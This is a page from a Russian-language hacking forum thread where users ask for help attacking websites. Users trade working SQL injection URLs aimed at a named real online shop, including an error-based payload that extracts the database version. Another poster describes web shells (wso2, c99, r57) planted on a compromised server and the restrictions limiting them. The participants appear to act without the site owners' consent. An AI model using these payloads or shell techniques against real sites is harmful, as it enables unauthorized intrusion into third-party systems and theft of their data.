HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1468 из 2438 « Первая < 468968136814181458 1464 1465 1466 1467 1468 1469 1470 1471 1472 1478151815681968 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #14671  
Старый 09.08.2010, 17:31
Koren
Новичок
Регистрация: 11.07.2009
Сообщений: 3
Провел на форуме:
19069

Репутация: 0
По умолчанию
есть уязвимость вида product.php?id=-82+union+select+1,2,3,4--

колонки подбираются без проблем, но информацию не выдаёт

подумал может фильт заменял union+select как только можно, нет...

слышал такая ситуация уже разбиралась, но ответа не нащёл(

подскажит кто?
 
Ответить с цитированием

  #14672  
Старый 09.08.2010, 17:34
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию
Цитата:
Сообщение от Koren  
Koren said:
есть уязвимость вида product.php?id=-82+union+select+1,2,3,4--
колонки подбираются без проблем, но информацию не выдаёт
подумал может фильт заменял union+select как только можно, нет...
слышал такая ситуация уже разбиралась, но ответа не нащёл(
подскажит кто?
выложи линк посмотрим...
 
Ответить с цитированием

  #14673  
Старый 09.08.2010, 17:36
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию
Цитата:
Сообщение от Koren  
Koren said:
есть уязвимость вида product.php?id=-82+union+select+1,2,3,4--
колонки подбираются без проблем, но информацию не выдаёт
подумал может фильт заменял union+select как только можно, нет...
слышал такая ситуация уже разбиралась, но ответа не нащёл(
подскажит кто?
плохо искал если не нашел >>>>>
 
Ответить с цитированием

  #14674  
Старый 09.08.2010, 18:34
mr.celt
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423

Репутация: 32
По умолчанию
Цитата:
Сообщение от manmerritt0  
manmerritt0 said:
...Врядли админы будут выключать safe_mod после того, как увидели уязвимость. Тем более, что у меня там сейчас залито все 3 шелла(wso2,c99,r57) и все также:на 2-х safemod on, на r57-off
....
Так проведем простой эксперимент: залей на сервак простой скриптик с таким содержанием:

Код:
Code:
Запроси его через web. Какое значение имеет параметр safe_mode?
 
Ответить с цитированием

  #14675  
Старый 09.08.2010, 20:08
manmerritt0
Guest
Сообщений: n/a
Провел на форуме:
1882

Репутация: 0
По умолчанию
Цитата:
Сообщение от None  
Запроси его через web. Какое значение имеет параметр safe_mode?
Запросил.

Local value: safe_mod on, + ограничения с помощью open_basedir.

Master value :safe_mod off, open_basedir: no_value

Насколько я понимаю на master value не стоит обращать внимание? Это параметры для рута?
 
Ответить с цитированием

  #14676  
Старый 10.08.2010, 00:44
fl00der
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме:
919131

Репутация: 74
По умолчанию
Привет, друзья.

А есть ли на нашем уютненьком статья, раскрывающая тему LFI и/или RFI? По поиску находится множество тем с обсуждением конкретных примеров, но вот статей о данном типе уязвимости я, честно говоря, не нашел.
 
Ответить с цитированием

  #14677  
Старый 10.08.2010, 00:54
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию
Цитата:
Сообщение от fl00der  
fl00der said:
Привет, друзья.
А есть ли на нашем уютненьком статья, раскрывающая тему LFI и/или RFI? По поиску находится множество тем с обсуждением конкретных примеров, но вот статей о данном типе уязвимости я, честно говоря, не нашел.
/threadnav12123-1-10.html

/thread23501.html
 
Ответить с цитированием

  #14678  
Старый 10.08.2010, 01:05
fl00der
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме:
919131

Репутация: 74
По умолчанию
Спасибо!
 
Ответить с цитированием

  #14679  
Старый 10.08.2010, 02:19
Koren
Новичок
Регистрация: 11.07.2009
Сообщений: 3
Провел на форуме:
19069

Репутация: 0
По умолчанию
подсказывали подсказывали, не получилось ничего(

Цитата:
Сообщение от None  
http://www.sweetstems.com.au/product.php?id=82+union+select+1,2,3,4--
помогаем.. плыз
 
Ответить с цитированием

  #14680  
Старый 10.08.2010, 02:35
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию
Цитата:
Сообщение от Koren  
Koren said:
подсказывали подсказывали, не получилось ничего(
помогаем.. плыз
http://www.sweetstems.com.au/product.php?id=82+or+(1,1)=(select+count(0),concat ((select+version()+from+information_schema.tables+ limit+0,1),floor(rand(0)*2))from(information_schem a.tables)+group+by+2)--+
 
Ответить с цитированием
Ответ
Страница 1468 из 2438 « Первая < 468968136814181458 1464 1465 1466 1467 1468 1469 1470 1471 1472 1478151815681968 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ